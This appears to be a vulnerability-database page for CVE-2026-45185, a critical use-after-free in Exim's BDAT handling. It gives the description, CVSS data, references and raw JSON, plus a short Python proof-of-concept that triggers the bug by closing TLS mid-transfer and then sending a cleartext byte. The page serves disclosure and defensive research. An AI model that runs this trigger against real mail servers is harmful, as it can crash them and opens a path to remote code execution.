Security Vulnerability Report
中文
CVE-2026-45185 CVSS 9.8 CRITICAL

CVE-2026-45185

Published: 2026-05-12 20:16:46
Last Modified: 2026-05-12 21:16:17
Source: [email protected]

Description

Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Exim < 4.99.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import ssl def exploit_poc(target_host, target_port): # Create TCP connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) # Upgrade to TLS context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE tls_sock = context.wrap_socket(sock, server_hostname=target_host) # SMTP Handshake tls_sock.send(b'EHLO attacker\r\n') tls_sock.send(b'MAIL FROM:<attacker@local>\r\n') tls_sock.send(b'RCPT TO:<victim@local>\r\n') # Initiate CHUNKING (BDAT) tls_sock.send(b'BDAT 512\r\n') # Send partial body data tls_sock.send(b'A' * 256) # Trigger Vulnerability: Send TLS close_notify # This closes the TLS layer but keeps TCP open tls_sock.unwrap() # Send final cleartext byte on the same TCP connection # This triggers the Use-After-Free in BDAT parsing sock.send(b'\x00') sock.close() # Usage: exploit_poc('127.0.0.1', 25)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45185", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:46.137", "lastModified": "2026-05-12T21:16:16.807", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://code.exim.org/exim/wiki/wiki/EximSecurity", "source": "[email protected]"}, {"url": "https://exim.org", "source": "[email protected]"}, {"url": "https://exim.org/static/doc/security/CVE-2026-45185.txt", "source": "[email protected]"}, {"url": "https://exim.org/static/doc/security/EXIM-Security-2026-05-01.1/", "source": "[email protected]"}, {"url": "https://news.ycombinator.com/item?id=48111748", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/12/4", "source": "[email protected]"}, {"url": "https://xbow.com/blog/dead-letter-cve-2026-45185-xbow-found-rce-exim", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.